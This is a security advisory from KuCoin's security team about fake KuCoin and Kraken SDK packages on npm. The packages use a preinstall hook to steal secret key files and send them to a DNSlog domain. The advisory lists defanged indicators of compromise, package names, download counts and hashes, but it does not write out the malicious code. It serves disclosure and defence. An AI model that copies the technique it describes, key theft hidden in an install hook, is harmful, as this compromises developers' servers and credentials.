union-icon
img

Alert | KuCoin Security Team Captures Supply Chain Attack Targeting Exchange Users

2025/02/18 07:45:49

Custom Image

Introduction 

On February 12, 2025, the Kucoin security team detected a supply chain attack targeting users of major centralized exchanges (CEXs) through its self-developed security scanning platform. The team quickly responded and analyzed the malicious behaviors embedded in the dependency package. As of now, the malicious dependency has been downloaded hundreds of times. Kucoin’s security team has reported the malicious dependency to NPM’s official team and is issuing this alert to warn users to stay vigilant. 

Sample Analysis 

Sample Behavior 

Kucoin’s security scanning platform detected a dependency package disguised as the Kucoin API SDK in the official NPM repository. When installed via npm, this package retrieves secret keys stored on the user’s server or local machine and sends them to the malicious domain: http://ihlkoqayjlegsltkrlhf1sg6hpfdbmrgy[.]oast[.]fun

Custom Image

Sample Analysis

Analysis through Kucoin’s sandbox scanning platform revealed that this malicious dependency was masquerading as SDK dependency packages related to both Kucoin and Kraken on the NPM official repository.

Custom Image

Custom Image

These types of dependencies employ obfuscated names to trick users into installing fake dependency packages. During the installation process, they embed malicious commands that extract secret key files from the user’s local environment or server and send the data to a malicious domain via DNSlog.

Custom Image

The specific trigger point of the malicious behavior is as follows: the malicious command is executed during the pre-installation phase of the dependency package.

Custom Image

All 10 dependency packages in the repository of this malicious source exhibit the same behavior. 

Custom Image

Attacker Profile 

The investigation uncovered the following registration details associated with the attacker on the NPM official repository: 

Username: superhotuser1
Email: tafes30513@shouxs[.]com 

According to verifymail.io, the domain shouxs[.]com is associated with temporary email services, indicating that the attacker is an experienced hacker skilled in anti-tracking techniques.

Custom Image

Threat Description 

Supply chain attacks pose significant risks. As they develop, their impact expands, given that many projects rely on numerous third-party packages. Once a malicious package is published and widely used, its effects spread rapidly. Malicious dependencies can steal sensitive user information, such as environment variables, API keys, and user data, leading to data leaks. They can also execute destructive actions like file deletion, data encryption (ransomware), or system disruption. Furthermore, attackers may implant backdoors within the package, allowing long-term control over affected systems and enabling further attacks. 

The malicious dependencies targeting Kucoin and Kraken specifically steal user login keys. If users log into their personal computers or servers using usernames and passwords, there is a significant risk that their servers could be compromised. 

As of the time Kucoin’s security team issued this alert, the malicious dependency had been downloaded hundreds of times. The download statistics are as follows: 

kucoin-production, downloads: 67
kucoin-main, downloads: 70
kucoin-internal, downloads: 63
kucoin-test, downloads: 69
kucoin-dev, downloads: 66 

kraken-dev, downloads: 70
kraken-main, downloads: 65
kraken-production, downloads: 67
kraken-test, downloads: 65
kraken-internal, downloads: 64 

IOC 

Type 

Value 

Remarks 

Domain 

http://ihlkoqayjlegsltkrlhf1sg6hpfdbmrgy[.]oast[.]fun

Malicious Dnslog Subdomain 

https://www[.]npmjs[.]com/~superhotuser1

Malicious Dependency Source URL 

Installation Package Hash 

cc07e9817e1da39f3d2666859cfaee3dd6d4a9052353babdc8e57c27e0bafc07 kucoin-main-19.4.9.tgz 

db516926a9950b9df351f714c9ed0ae4b521b1b37336480e2dd5d5c9a8118b53 kucoin-production-19.4.9.tgz 

2e0e190d7f1af6e47849142eec76b69e9a5324258f6ea388696b1e2e6d87e2f8 kucoin-dev-19.4.9.tgz 

ea1da680560eefa3b55a483a944feeee292f273873007c09fd971582839a7989 kucoin-test-19.4.9.tgz 

6de0c9adf18a472027235f435f440a86cfae58e84be087a2dde9b5eec8eba80c kucoin-internal-19.4.9.tgz 

1c9c5fd79c3371838907a108298dfb5b9dd10692b021b664a54d2093b668f722 kraken-test-19.4.9.tgz 

371d9ba2071b29a1e857697d751f3716f0749a05495899f2320ba78530a884c5 kraken-dev-19.4.9.tgz 

be50cb0c9c84fec7695ae775efc31da5c2c7279068caf08bd5c4f7e04dbc748f kraken-production-19.4.9.tgz 

8b1576d6bba74aa9d66a0d7907c9afe8725f30dcf1d277c63c590adf6d8c1a4e kraken-main-19.4.9.tgz 

7fa9feb4776c7115edbcd6544ed1fd8d9b0988eeda1434ba45b8ea0803e02f21 kraken-internal-19.4.9.tgz 

Malicious Dependency Package Sha256 Value 

Mitigation 

From the time the attacker uploaded the malicious dependency to the moment Kucoin’s security team detected it, less than one day had passed. Kucoin’s security team has already reported the issue to NPM’s official team, though further investigation and removal may take some time. In the meantime, Kucoin has issued this public warning to alert users and help prevent compromise.